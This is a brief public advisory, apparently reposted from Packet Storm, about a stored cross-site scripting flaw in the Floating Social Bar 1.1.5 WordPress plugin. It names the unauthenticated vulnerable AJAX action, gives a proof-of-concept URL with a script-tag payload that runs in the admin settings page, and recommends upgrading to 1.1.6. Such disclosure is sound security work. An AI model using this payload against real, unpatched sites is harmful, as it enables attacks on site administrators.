WordPress Floating Social Bar 1.1.5 Cross Site Scripting

Posted on Posted in Exploit

WordPress Floating Social Bar version 1.1.5 suffers from a cross site scripting vulnerability.

# Exploit Title: Floating Social Bar 1.1.5 XSS
# Date: 09-01-2015
# Software Link: https://wordpress.org/plugins/floating-social-bar/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description
  
Everyone can access save_order().

File: floating-social-bar\class-floating-social-bar.php

add_action( 'wp_ajax_nopriv_fsb_save_order', array( $this, 'save_order' ) );

$_REQUEST['items'] is not escaped.

http://security.szurek.pl/floating-social-bar-115-xss.html

2. Proof of Concept

http://wordpress-url/wp-admin/admin-ajax.php?action=fsb_save_order&items[1]="><script>alert("XSS");</script>

XSS will be visible for admin:

http://wordpress-url/wp-admin/options-general.php?page=floating-social-bar

3. Solution:
  
Update to version 1.1.6

Quelle: Packet storm Security

Facebooktwittergoogle_plus